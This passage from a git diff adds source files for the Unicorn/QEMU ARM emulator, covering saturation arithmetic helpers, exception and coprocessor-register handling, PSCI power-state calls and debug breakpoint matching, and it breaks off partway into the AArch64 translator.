*/ +static inline uint32_t do_ssat(CPUARMState *env, int32_t val, int shift) +{ + int32_t top; + uint32_t mask; + + top = val >> shift; + mask = (1u << shift) - 1; + if (top > 0) { + env->QF = 1; + return mask; + } else if (top < -1) { + env->QF = 1; + return ~mask; + } + return val; +} + +/* Unsigned saturation. */ +static inline uint32_t do_usat(CPUARMState *env, int32_t val, int shift) +{ + uint32_t max; + + max = (1u << shift) - 1; + if (val < 0) { + env->QF = 1; + return 0; + } else if (val > max) { + env->QF = 1; + return max; + } + return val; +} + +/* Signed saturate. */ +uint32_t HELPER(ssat)(CPUARMState *env, uint32_t x, uint32_t shift) +{ + return do_ssat(env, x, shift); +} + +/* Dual halfword signed saturate. */ +uint32_t HELPER(ssat16)(CPUARMState *env, uint32_t x, uint32_t shift) +{ + uint32_t res; + + res = (uint16_t)do_ssat(env, (int16_t)x, shift); + res |= do_ssat(env, ((int32_t)x) >> 16, shift) << 16; + return res; +} + +/* Unsigned saturate. */ +uint32_t HELPER(usat)(CPUARMState *env, uint32_t x, uint32_t shift) +{ + return do_usat(env, x, shift); +} + +/* Dual halfword unsigned saturate. */ +uint32_t HELPER(usat16)(CPUARMState *env, uint32_t x, uint32_t shift) +{ + uint32_t res; + + res = (uint16_t)do_usat(env, (int16_t)x, shift); + res |= do_usat(env, ((int32_t)x) >> 16, shift) << 16; + return res; +} + +void HELPER(wfi)(CPUARMState *env) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + + cs->exception_index = EXCP_HLT; + cs->halted = 1; + cpu_loop_exit(cs); +} + +void HELPER(wfe)(CPUARMState *env) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + + /* Don't actually halt the CPU, just yield back to top + * level loop + */ + cs->exception_index = EXCP_YIELD; + cpu_loop_exit(cs); +} + +/* Raise an internal-to-QEMU exception. 
This is limited to only + * those EXCP values which are special cases for QEMU to interrupt + * execution and not to be used for exceptions which are passed to + * the guest (those must all have syndrome information and thus should + * use exception_with_syndrome). + */ +void HELPER(exception_internal)(CPUARMState *env, uint32_t excp) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + + assert(excp_is_internal(excp)); + cs->exception_index = excp; + cpu_loop_exit(cs); +} + +/* Raise an exception with the specified syndrome register value */ +void HELPER(exception_with_syndrome)(CPUARMState *env, uint32_t excp, + uint32_t syndrome) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + + assert(!excp_is_internal(excp)); + cs->exception_index = excp; // qq + env->exception.syndrome = syndrome; + cpu_loop_exit(cs); +} + +uint32_t HELPER(cpsr_read)(CPUARMState *env) +{ + return cpsr_read(env) & ~(CPSR_EXEC | CPSR_RESERVED); +} + +void HELPER(cpsr_write)(CPUARMState *env, uint32_t val, uint32_t mask) +{ + cpsr_write(env, val, mask); +} + +/* Access to user mode registers from privileged modes. 
*/ +uint32_t HELPER(get_user_reg)(CPUARMState *env, uint32_t regno) +{ + uint32_t val; + + if (regno == 13) { + val = env->banked_r13[0]; + } else if (regno == 14) { + val = env->banked_r14[0]; + } else if (regno >= 8 + && (env->uncached_cpsr & 0x1f) == ARM_CPU_MODE_FIQ) { + val = env->usr_regs[regno - 8]; + } else { + val = env->regs[regno]; + } + return val; +} + +void HELPER(set_user_reg)(CPUARMState *env, uint32_t regno, uint32_t val) +{ + if (regno == 13) { + env->banked_r13[0] = val; + } else if (regno == 14) { + env->banked_r14[0] = val; + } else if (regno >= 8 + && (env->uncached_cpsr & 0x1f) == ARM_CPU_MODE_FIQ) { + env->usr_regs[regno - 8] = val; + } else { + env->regs[regno] = val; + } +} + +void HELPER(access_check_cp_reg)(CPUARMState *env, void *rip, uint32_t syndrome) +{ + const ARMCPRegInfo *ri = rip; + + if (arm_feature(env, ARM_FEATURE_XSCALE) && ri->cp < 14 + && extract32(env->cp15.c15_cpar, ri->cp, 1) == 0) { + env->exception.syndrome = syndrome; + raise_exception(env, EXCP_UDEF); + } + + if (!ri->accessfn) { + return; + } + + switch (ri->accessfn(env, ri)) { + case CP_ACCESS_OK: + return; + case CP_ACCESS_TRAP: + env->exception.syndrome = syndrome; + break; + case CP_ACCESS_TRAP_UNCATEGORIZED: + env->exception.syndrome = syn_uncategorized(); + break; + default: + g_assert_not_reached(); + } + raise_exception(env, EXCP_UDEF); +} + +void HELPER(set_cp_reg)(CPUARMState *env, void *rip, uint32_t value) +{ + const ARMCPRegInfo *ri = rip; + + ri->writefn(env, ri, value); +} + +uint32_t HELPER(get_cp_reg)(CPUARMState *env, void *rip) +{ + const ARMCPRegInfo *ri = rip; + + return ri->readfn(env, ri); +} + +void HELPER(set_cp_reg64)(CPUARMState *env, void *rip, uint64_t value) +{ + const ARMCPRegInfo *ri = rip; + + ri->writefn(env, ri, value); +} + +uint64_t HELPER(get_cp_reg64)(CPUARMState *env, void *rip) +{ + const ARMCPRegInfo *ri = rip; + + return ri->readfn(env, ri); +} + +void HELPER(msr_i_pstate)(CPUARMState *env, uint32_t op, uint32_t imm) +{ + 
/* MSR_i to update PSTATE. This is OK from EL0 only if UMA is set. + * Note that SPSel is never OK from EL0; we rely on handle_msr_i() + * to catch that case at translate time. + */ + if (arm_current_el(env) == 0 && !(env->cp15.c1_sys & SCTLR_UMA)) { + raise_exception(env, EXCP_UDEF); + } + + switch (op) { + case 0x05: /* SPSel */ + update_spsel(env, imm); + break; + case 0x1e: /* DAIFSet */ + env->daif |= (imm << 6) & PSTATE_DAIF; + break; + case 0x1f: /* DAIFClear */ + env->daif &= ~((imm << 6) & PSTATE_DAIF); + break; + default: + g_assert_not_reached(); + } +} + +void HELPER(clear_pstate_ss)(CPUARMState *env) +{ + env->pstate &= ~PSTATE_SS; +} + +void HELPER(pre_hvc)(CPUARMState *env) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + int cur_el = arm_current_el(env); + /* FIXME: Use actual secure state. */ + bool secure = false; + bool undef; + + if (arm_is_psci_call(cpu, EXCP_HVC)) { + /* If PSCI is enabled and this looks like a valid PSCI call then + * that overrides the architecturally mandated HVC behaviour. + */ + return; + } + + if (!arm_feature(env, ARM_FEATURE_EL2)) { + /* If EL2 doesn't exist, HVC always UNDEFs */ + undef = true; + } else if (arm_feature(env, ARM_FEATURE_EL3)) { + /* EL3.HCE has priority over EL2.HCD. */ + undef = !(env->cp15.scr_el3 & SCR_HCE); + } else { + undef = env->cp15.hcr_el2 & HCR_HCD; + } + + /* In ARMv7 and ARMv8/AArch32, HVC is undef in secure state. + * For ARMv8/AArch64, HVC is allowed in EL3. + * Note that we've already trapped HVC from EL0 at translation + * time. + */ + if (secure && (!is_a64(env) || cur_el == 1)) { + undef = true; + } + + if (undef) { + env->exception.syndrome = syn_uncategorized(); + raise_exception(env, EXCP_UDEF); + } +} + +void HELPER(pre_smc)(CPUARMState *env, uint32_t syndrome) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + int cur_el = arm_current_el(env); + bool secure = arm_is_secure(env); + bool smd = env->cp15.scr_el3 & SCR_SMD; + /* On ARMv8 AArch32, SMD only applies to NS state. 
+ * On ARMv7 SMD only applies to NS state and only if EL2 is available. + * For ARMv7 non EL2, we force SMD to zero so we don't need to re-check + * the EL2 condition here. + */ + bool undef = is_a64(env) ? smd : (!secure && smd); + + if (arm_is_psci_call(cpu, EXCP_SMC)) { + /* If PSCI is enabled and this looks like a valid PSCI call then + * that overrides the architecturally mandated SMC behaviour. + */ + return; + } + + if (!arm_feature(env, ARM_FEATURE_EL3)) { + /* If we have no EL3 then SMC always UNDEFs */ + undef = true; + } else if (!secure && cur_el == 1 && (env->cp15.hcr_el2 & HCR_TSC)) { + /* In NS EL1, HCR controlled routing to EL2 has priority over SMD. */ + env->exception.syndrome = syndrome; + raise_exception(env, EXCP_HYP_TRAP); + } + + if (undef) { + env->exception.syndrome = syn_uncategorized(); + raise_exception(env, EXCP_UDEF); + } +} + +void HELPER(exception_return)(CPUARMState *env) +{ + int cur_el = arm_current_el(env); + unsigned int spsr_idx = aarch64_banked_spsr_index(cur_el); + uint32_t spsr = env->banked_spsr[spsr_idx]; + int new_el, i; + + aarch64_save_sp(env, cur_el); + + env->exclusive_addr = -1; + + /* We must squash the PSTATE.SS bit to zero unless both of the + * following hold: + * 1. debug exceptions are currently disabled + * 2. singlestep will be active in the EL we return to + * We check 1 here and 2 after we've done the pstate/cpsr write() to + * transition to the EL we're going to. + */ + if (arm_generate_debug_exceptions(env)) { + spsr &= ~PSTATE_SS; + } + + if (spsr & PSTATE_nRW) { + /* TODO: We currently assume EL1/2/3 are running in AArch64. 
*/ + env->aarch64 = 0; + new_el = 0; + env->uncached_cpsr = 0x10; + cpsr_write(env, spsr, ~0); + if (!arm_singlestep_active(env)) { + env->uncached_cpsr &= ~PSTATE_SS; + } + for (i = 0; i < 15; i++) { + env->regs[i] = env->xregs[i]; + } + + env->regs[15] = env->elr_el[1] & ~0x1; + } else { + new_el = extract32(spsr, 2, 2); + if (new_el > cur_el + || (new_el == 2 && !arm_feature(env, ARM_FEATURE_EL2))) { + /* Disallow return to an EL which is unimplemented or higher + * than the current one. + */ + goto illegal_return; + } + if (extract32(spsr, 1, 1)) { + /* Return with reserved M[1] bit set */ + goto illegal_return; + } + if (new_el == 0 && (spsr & PSTATE_SP)) { + /* Return to EL0 with M[0] bit set */ + goto illegal_return; + } + env->aarch64 = 1; + pstate_write(env, spsr); + if (!arm_singlestep_active(env)) { + env->pstate &= ~PSTATE_SS; + } + aarch64_restore_sp(env, new_el); + env->pc = env->elr_el[cur_el]; + } + + return; + +illegal_return: + /* Illegal return events of various kinds have architecturally + * mandated behaviour: + * restore NZCV and DAIF from SPSR_ELx + * set PSTATE.IL + * restore PC from ELR_ELx + * no change to exception level, execution state or stack pointer + */ + env->pstate |= PSTATE_IL; + env->pc = env->elr_el[cur_el]; + spsr &= PSTATE_NZCV | PSTATE_DAIF; + spsr |= pstate_read(env) & ~(PSTATE_NZCV | PSTATE_DAIF); + pstate_write(env, spsr); + if (!arm_singlestep_active(env)) { + env->pstate &= ~PSTATE_SS; + } +} + +/* Return true if the linked breakpoint entry lbn passes its checks */ +static bool linked_bp_matches(ARMCPU *cpu, int lbn) +{ + CPUARMState *env = &cpu->env; + uint64_t bcr = env->cp15.dbgbcr[lbn]; + int brps = extract32(cpu->dbgdidr, 24, 4); + int ctx_cmps = extract32(cpu->dbgdidr, 20, 4); + int bt; + uint32_t contextidr; + + /* Links to unimplemented or non-context aware breakpoints are + * CONSTRAINED UNPREDICTABLE: either behave as if disabled, or + * as if linked to an UNKNOWN context-aware breakpoint (in which + * case 
DBGWCR_EL1.LBN must indicate that breakpoint). + * We choose the former. + */ + if (lbn > brps || lbn < (brps - ctx_cmps)) { + return false; + } + + bcr = env->cp15.dbgbcr[lbn]; + + if (extract64(bcr, 0, 1) == 0) { + /* Linked breakpoint disabled : generate no events */ + return false; + } + + bt = extract64(bcr, 20, 4); + + /* We match the whole register even if this is AArch32 using the + * short descriptor format (in which case it holds both PROCID and ASID), + * since we don't implement the optional v7 context ID masking. + */ + contextidr = extract64(env->cp15.contextidr_el1, 0, 32); + + switch (bt) { + case 3: /* linked context ID match */ + if (arm_current_el(env) > 1) { + /* Context matches never fire in EL2 or (AArch64) EL3 */ + return false; + } + return (contextidr == extract64(env->cp15.dbgbvr[lbn], 0, 32)); + case 5: /* linked address mismatch (reserved in AArch64) */ + case 9: /* linked VMID match (reserved if no EL2) */ + case 11: /* linked context ID and VMID match (reserved if no EL2) */ + default: + /* Links to Unlinked context breakpoints must generate no + * events; we choose to do the same for reserved values too. + */ + return false; + } + + return false; +} + +static bool bp_wp_matches(ARMCPU *cpu, int n, bool is_wp) +{ + CPUARMState *env = &cpu->env; + uint64_t cr; + int pac, hmc, ssc, wt, lbn; + /* TODO: check against CPU security state when we implement TrustZone */ + bool is_secure = false; + + if (is_wp) { + if (!env->cpu_watchpoint[n] + || !(env->cpu_watchpoint[n]->flags & BP_WATCHPOINT_HIT)) { + return false; + } + cr = env->cp15.dbgwcr[n]; + } else { + uint64_t pc = is_a64(env) ? 
env->pc : env->regs[15]; + + if (!env->cpu_breakpoint[n] || env->cpu_breakpoint[n]->pc != pc) { + return false; + } + cr = env->cp15.dbgbcr[n]; + } + /* The WATCHPOINT_HIT flag guarantees us that the watchpoint is + * enabled and that the address and access type match; for breakpoints + * we know the address matched; check the remaining fields, including + * linked breakpoints. We rely on WCR and BCR having the same layout + * for the LBN, SSC, HMC, PAC/PMC and is-linked fields. + * Note that some combinations of {PAC, HMC, SSC} are reserved and + * must act either like some valid combination or as if the watchpoint + * were disabled. We choose the former, and use this together with + * the fact that EL3 must always be Secure and EL2 must always be + * Non-Secure to simplify the code slightly compared to the full + * table in the ARM ARM. + */ + pac = extract64(cr, 1, 2); + hmc = extract64(cr, 13, 1); + ssc = extract64(cr, 14, 2); + + switch (ssc) { + case 0: + break; + case 1: + case 3: + if (is_secure) { + return false; + } + break; + case 2: + if (!is_secure) { + return false; + } + break; + } + + /* TODO: this is not strictly correct because the LDRT/STRT/LDT/STT + * "unprivileged access" instructions should match watchpoints as if + * they were accesses done at EL0, even if the CPU is at EL1 or higher. + * Implementing this would require reworking the core watchpoint code + * to plumb the mmu_idx through to this point. Luckily Linux does not + * rely on this behaviour currently. + * For breakpoints we do want to use the current CPU state. 
+ */ + switch (arm_current_el(env)) { + case 3: + case 2: + if (!hmc) { + return false; + } + break; + case 1: + if (extract32(pac, 0, 1) == 0) { + return false; + } + break; + case 0: + if (extract32(pac, 1, 1) == 0) { + return false; + } + break; + default: + g_assert_not_reached(); + } + + wt = extract64(cr, 20, 1); + lbn = extract64(cr, 16, 4); + + if (wt && !linked_bp_matches(cpu, lbn)) { + return false; + } + + return true; +} + +static bool check_watchpoints(ARMCPU *cpu) +{ + CPUARMState *env = &cpu->env; + int n; + + /* If watchpoints are disabled globally or we can't take debug + * exceptions here then watchpoint firings are ignored. + */ + if (extract32(env->cp15.mdscr_el1, 15, 1) == 0 + || !arm_generate_debug_exceptions(env)) { + return false; + } + + for (n = 0; n < ARRAY_SIZE(env->cpu_watchpoint); n++) { + if (bp_wp_matches(cpu, n, true)) { + return true; + } + } + return false; +} + +static bool check_breakpoints(ARMCPU *cpu) +{ + CPUARMState *env = &cpu->env; + int n; + + /* If breakpoints are disabled globally or we can't take debug + * exceptions here then breakpoint firings are ignored. + */ + if (extract32(env->cp15.mdscr_el1, 15, 1) == 0 + || !arm_generate_debug_exceptions(env)) { + return false; + } + + for (n = 0; n < ARRAY_SIZE(env->cpu_breakpoint); n++) { + if (bp_wp_matches(cpu, n, false)) { + return true; + } + } + return false; +} + +void arm_debug_excp_handler(CPUState *cs) +{ + /* Called by core code when a watchpoint or breakpoint fires; + * need to check which one and raise the appropriate exception. 
+ */ + ARMCPU *cpu = ARM_CPU(cs->uc, cs); + CPUARMState *env = &cpu->env; + CPUWatchpoint *wp_hit = cs->watchpoint_hit; + + if (wp_hit) { + if (wp_hit->flags & BP_CPU) { + cs->watchpoint_hit = NULL; + if (check_watchpoints(cpu)) { + bool wnr = (wp_hit->flags & BP_WATCHPOINT_HIT_WRITE) != 0; + bool same_el = arm_debug_target_el(env) == arm_current_el(env); + + env->exception.syndrome = syn_watchpoint(same_el, 0, wnr); + if (extended_addresses_enabled(env)) { + env->exception.fsr = (1 << 9) | 0x22; + } else { + env->exception.fsr = 0x2; + } + env->exception.vaddress = wp_hit->hitaddr; + raise_exception(env, EXCP_DATA_ABORT); + } else { + cpu_resume_from_signal(cs, NULL); + } + } + } else { + if (check_breakpoints(cpu)) { + bool same_el = (arm_debug_target_el(env) == arm_current_el(env)); + env->exception.syndrome = syn_breakpoint(same_el); + if (extended_addresses_enabled(env)) { + env->exception.fsr = (1 << 9) | 0x22; + } else { + env->exception.fsr = 0x2; + } + /* FAR is UNKNOWN, so doesn't need setting */ + raise_exception(env, EXCP_PREFETCH_ABORT); + } + } +} + +/* ??? Flag setting arithmetic is awkward because we need to do comparisons. + The only way to do that in TCG is a conditional branch, which clobbers + all our temporaries. For now implement these as helper functions. */ + +/* Similarly for variable shift instructions. 
*/ + +uint32_t HELPER(shl_cc)(CPUARMState *env, uint32_t x, uint32_t i) +{ + int shift = i & 0xff; + if (shift >= 32) { + if (shift == 32) + env->CF = x & 1; + else + env->CF = 0; + return 0; + } else if (shift != 0) { + env->CF = (x >> (32 - shift)) & 1; + return x << shift; + } + return x; +} + +uint32_t HELPER(shr_cc)(CPUARMState *env, uint32_t x, uint32_t i) +{ + int shift = i & 0xff; + if (shift >= 32) { + if (shift == 32) + env->CF = (x >> 31) & 1; + else + env->CF = 0; + return 0; + } else if (shift != 0) { + env->CF = (x >> (shift - 1)) & 1; + return x >> shift; + } + return x; +} + +uint32_t HELPER(sar_cc)(CPUARMState *env, uint32_t x, uint32_t i) +{ + int shift = i & 0xff; + if (shift >= 32) { + env->CF = (x >> 31) & 1; + return (int32_t)x >> 31; + } else if (shift != 0) { + env->CF = (x >> (shift - 1)) & 1; + return (int32_t)x >> shift; + } + return x; +} + +uint32_t HELPER(ror_cc)(CPUARMState *env, uint32_t x, uint32_t i) +{ + int shift1, shift; + shift1 = i & 0xff; + shift = shift1 & 0x1f; + if (shift == 0) { + if (shift1 != 0) + env->CF = (x >> 31) & 1; + return x; + } else { + env->CF = (x >> (shift - 1)) & 1; + return ((uint32_t)x >> shift) | (x << (32 - shift)); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/psci.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/psci.c new file mode 100644 index 0000000..5b305b1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/psci.c @@ -0,0 +1,242 @@ +/* + * Copyright (C) 2014 - Linaro + * Author: Rob Herring + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. 
+ * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, see . + */ +#include +#include +#include +#include +#include +#include "internals.h" + +bool arm_is_psci_call(ARMCPU *cpu, int excp_type) +{ + /* Return true if the r0/x0 value indicates a PSCI call and + * the exception type matches the configured PSCI conduit. This is + * called before the SMC/HVC instruction is executed, to decide whether + * we should treat it as a PSCI call or with the architecturally + * defined behaviour for an SMC or HVC (which might be UNDEF or trap + * to EL2 or to EL3). + */ + CPUARMState *env = &cpu->env; + uint64_t param = is_a64(env) ? env->xregs[0] : env->regs[0]; + + switch (excp_type) { + case EXCP_HVC: + if (cpu->psci_conduit != QEMU_PSCI_CONDUIT_HVC) { + return false; + } + break; + case EXCP_SMC: + if (cpu->psci_conduit != QEMU_PSCI_CONDUIT_SMC) { + return false; + } + break; + default: + return false; + } + + switch (param) { + case QEMU_PSCI_0_2_FN_PSCI_VERSION: + case QEMU_PSCI_0_2_FN_MIGRATE_INFO_TYPE: + case QEMU_PSCI_0_2_FN_AFFINITY_INFO: + case QEMU_PSCI_0_2_FN64_AFFINITY_INFO: + case QEMU_PSCI_0_2_FN_SYSTEM_RESET: + case QEMU_PSCI_0_2_FN_SYSTEM_OFF: + case QEMU_PSCI_0_1_FN_CPU_ON: + case QEMU_PSCI_0_2_FN_CPU_ON: + case QEMU_PSCI_0_2_FN64_CPU_ON: + case QEMU_PSCI_0_1_FN_CPU_OFF: + case QEMU_PSCI_0_2_FN_CPU_OFF: + case QEMU_PSCI_0_1_FN_CPU_SUSPEND: + case QEMU_PSCI_0_2_FN_CPU_SUSPEND: + case QEMU_PSCI_0_2_FN64_CPU_SUSPEND: + case QEMU_PSCI_0_1_FN_MIGRATE: + case QEMU_PSCI_0_2_FN_MIGRATE: + return true; + default: + return false; + } +} + +void arm_handle_psci_call(ARMCPU *cpu) +{ + /* + * This function partially implements the logic for dispatching Power State + * 
Coordination Interface (PSCI) calls (as described in ARM DEN 0022B.b), + * to the extent required for bringing up and taking down secondary cores, + * and for handling reset and poweroff requests. + * Additional information about the calling convention used is available in + * the document 'SMC Calling Convention' (ARM DEN 0028) + */ + CPUState *cs = CPU(cpu); + CPUARMState *env = &cpu->env; + uint64_t param[4]; + uint64_t context_id, mpidr; + target_ulong entry; + int32_t ret = 0; + int i; + + for (i = 0; i < 4; i++) { + /* + * All PSCI functions take explicit 32-bit or native int sized + * arguments so we can simply zero-extend all arguments regardless + * of which exact function we are about to call. + */ + param[i] = is_a64(env) ? env->xregs[i] : env->regs[i]; + } + + if ((param[0] & QEMU_PSCI_0_2_64BIT) && !is_a64(env)) { + ret = QEMU_PSCI_RET_INVALID_PARAMS; + goto err; + } + + switch (param[0]) { + CPUState *target_cpu_state; + ARMCPU *target_cpu; + CPUClass *target_cpu_class; + + case QEMU_PSCI_0_2_FN_PSCI_VERSION: + ret = QEMU_PSCI_0_2_RET_VERSION_0_2; + break; + case QEMU_PSCI_0_2_FN_MIGRATE_INFO_TYPE: + ret = QEMU_PSCI_0_2_RET_TOS_MIGRATION_NOT_REQUIRED; /* No trusted OS */ + break; + case QEMU_PSCI_0_2_FN_AFFINITY_INFO: + case QEMU_PSCI_0_2_FN64_AFFINITY_INFO: + mpidr = param[1]; + + switch (param[2]) { + case 0: + target_cpu_state = qemu_get_cpu(env->uc, mpidr & 0xff); + if (!target_cpu_state) { + ret = QEMU_PSCI_RET_INVALID_PARAMS; + break; + } + target_cpu = ARM_CPU(env->uc, target_cpu_state); + ret = target_cpu->powered_off ? 1 : 0; + break; + default: + /* Everything above affinity level 0 is always on. */ + ret = 0; + } + break; + case QEMU_PSCI_0_2_FN_SYSTEM_RESET: + qemu_system_reset_request(env->uc); + /* QEMU reset and shutdown are async requests, but PSCI + * mandates that we never return from the reset/shutdown + * call, so power the CPU off now so it doesn't execute + * anything further. 
+ */ + goto cpu_off; + case QEMU_PSCI_0_2_FN_SYSTEM_OFF: + qemu_system_shutdown_request(); + goto cpu_off; + case QEMU_PSCI_0_1_FN_CPU_ON: + case QEMU_PSCI_0_2_FN_CPU_ON: + case QEMU_PSCI_0_2_FN64_CPU_ON: + mpidr = param[1]; + entry = param[2]; + context_id = param[3]; + + /* change to the cpu we are powering up */ + target_cpu_state = qemu_get_cpu(env->uc, mpidr & 0xff); + if (!target_cpu_state) { + ret = QEMU_PSCI_RET_INVALID_PARAMS; + break; + } + target_cpu = ARM_CPU(env->uc, target_cpu_state); + if (!target_cpu->powered_off) { + ret = QEMU_PSCI_RET_ALREADY_ON; + break; + } + target_cpu_class = CPU_GET_CLASS(env->uc, target_cpu); + + /* Initialize the cpu we are turning on */ + cpu_reset(target_cpu_state); + target_cpu->powered_off = false; + target_cpu_state->halted = 0; + + /* + * The PSCI spec mandates that newly brought up CPUs enter the + * exception level of the caller in the same execution mode as + * the caller, with context_id in x0/r0, respectively. + * + * For now, it is sufficient to assert() that CPUs come out of + * reset in the same mode as the calling CPU, since we only + * implement EL1, which means that + * (a) there is no EL2 for the calling CPU to trap into to change + * its state + * (b) the newly brought up CPU enters EL1 immediately after coming + * out of reset in the default state + */ + assert(is_a64(env) == is_a64(&target_cpu->env)); + if (is_a64(env)) { + if (entry & 1) { + ret = QEMU_PSCI_RET_INVALID_PARAMS; + break; + } + target_cpu->env.xregs[0] = context_id; + } else { + target_cpu->env.regs[0] = context_id; + target_cpu->env.thumb = entry & 1; + } + target_cpu_class->set_pc(target_cpu_state, entry); + + ret = 0; + break; + case QEMU_PSCI_0_1_FN_CPU_OFF: + case QEMU_PSCI_0_2_FN_CPU_OFF: + goto cpu_off; + case QEMU_PSCI_0_1_FN_CPU_SUSPEND: + case QEMU_PSCI_0_2_FN_CPU_SUSPEND: + case QEMU_PSCI_0_2_FN64_CPU_SUSPEND: + /* Affinity levels are not supported in QEMU */ + if (param[1] & 0xfffe0000) { + ret = QEMU_PSCI_RET_INVALID_PARAMS; 
+ break; + } + /* Powerdown is not supported, we always go into WFI */ + if (is_a64(env)) { + env->xregs[0] = 0; + } else { + env->regs[0] = 0; + } + helper_wfi(env); + break; + case QEMU_PSCI_0_1_FN_MIGRATE: + case QEMU_PSCI_0_2_FN_MIGRATE: + ret = QEMU_PSCI_RET_NOT_SUPPORTED; + break; + default: + g_assert_not_reached(); + } + +err: + if (is_a64(env)) { + env->xregs[0] = ret; + } else { + env->regs[0] = ret; + } + return; + +cpu_off: + cpu->powered_off = true; + cs->halted = 1; + cs->exception_index = EXCP_HLT; + cpu_loop_exit(cs); + /* notreached */ +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate-a64.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate-a64.c new file mode 100644 index 0000000..52337b9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/translate-a64.c @@ -0,0 +1,11280 @@ +/* + * AArch64 translation + * + * Copyright (c) 2013 Alexander Graf + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ +#include +#include +#include +#include +#include "unicorn/platform.h" + +#include "cpu.h" +#include "tcg-op.h" +#include "qemu/log.h" +#include "arm_ldst.h" +#include "translate.h" +#include "internals.h" +#include "qemu/host-utils.h" + +#include "exec/helper-proto.h" +#include "exec/helper-gen.h" + +#include "exec/gen-icount.h" + +#ifdef CONFIG_USER_ONLY +static TCGv_i64 cpu_exclusive_test; +static TCGv_i32 cpu_exclusive_info; +#endif + +static const char *regnames[] = { + "x0", "x1", "x2", "x3", "x4", "x5", "x6", "x7", + "x8", "x9", "x10", "x11", "x12", "x13", "x14", "x15", + "x16", "x17", "x18", "x19", "x20", "x21", "x22", "x23", + "x24", "x25", "x26", "x27", "x28", "x29", "lr", "sp" +}; + +enum a64_shift_type { + A64_SHIFT_TYPE_LSL = 0, + A64_SHIFT_TYPE_LSR = 1, + A64_SHIFT_TYPE_ASR = 2, + A64_SHIFT_TYPE_ROR = 3 +}; + +/* Table based decoder typedefs - used when the relevant bits for decode + * are too awkwardly scattered across the instruction (eg SIMD). + */ +typedef void AArch64DecodeFn(DisasContext *s, uint32_t insn); + +typedef struct AArch64DecodeTable { + uint32_t pattern; + uint32_t mask; + AArch64DecodeFn *disas_fn; +} AArch64DecodeTable; + +/* Function prototype for gen_ functions for calling Neon helpers */ +typedef void NeonGenOneOpEnvFn(TCGContext *t, TCGv_i32, TCGv_ptr, TCGv_i32); +typedef void NeonGenTwoOpFn(TCGContext *t, TCGv_i32, TCGv_i32, TCGv_i32); +typedef void NeonGenTwoOpEnvFn(TCGContext *t, TCGv_i32, TCGv_ptr, TCGv_i32, TCGv_i32); +typedef void NeonGenTwo64OpFn(TCGContext *t, TCGv_i64, TCGv_i64, TCGv_i64); +typedef void NeonGenTwo64OpEnvFn(TCGContext *t, TCGv_i64, TCGv_ptr, TCGv_i64, TCGv_i64); +typedef void NeonGenNarrowFn(TCGContext *t, TCGv_i32, TCGv_i64); +typedef void NeonGenNarrowEnvFn(TCGContext *t, TCGv_i32, TCGv_ptr, TCGv_i64); +typedef void NeonGenWidenFn(TCGContext *t, TCGv_i64, TCGv_i32); +typedef void NeonGenTwoSingleOPFn(TCGContext *t, TCGv_i32, TCGv_i32, TCGv_i32, TCGv_ptr); +typedef void 
NeonGenTwoDoubleOPFn(TCGContext *t, TCGv_i64, TCGv_i64, TCGv_i64, TCGv_ptr); +typedef void NeonGenOneOpFn(TCGContext *t, TCGv_i64, TCGv_i64); +typedef void CryptoTwoOpEnvFn(TCGContext *t, TCGv_ptr, TCGv_i32, TCGv_i32); +typedef void CryptoThreeOpEnvFn(TCGContext *t, TCGv_ptr, TCGv_i32, TCGv_i32, TCGv_i32); + +/* initialize TCG globals. */ +void a64_translate_init(struct uc_struct *uc) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + int i; + + tcg_ctx->cpu_pc = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, pc), + "pc"); + for (i = 0; i < 32; i++) { + tcg_ctx->cpu_X[i] = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, xregs[i]), + regnames[i]); + } + + tcg_ctx->cpu_NF = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, offsetof(CPUARMState, NF), "NF"); + tcg_ctx->cpu_ZF = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, offsetof(CPUARMState, ZF), "ZF"); + tcg_ctx->cpu_CF = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, offsetof(CPUARMState, CF), "CF"); + tcg_ctx->cpu_VF = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, offsetof(CPUARMState, VF), "VF"); + + tcg_ctx->cpu_exclusive_addr = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_addr), "exclusive_addr"); + tcg_ctx->cpu_exclusive_val = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_val), "exclusive_val"); + tcg_ctx->cpu_exclusive_high = tcg_global_mem_new_i64(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUARMState, exclusive_high), "exclusive_high"); +#ifdef CONFIG_USER_ONLY + cpu_exclusive_test = tcg_global_mem_new_i64(uc->tcg_ctx, 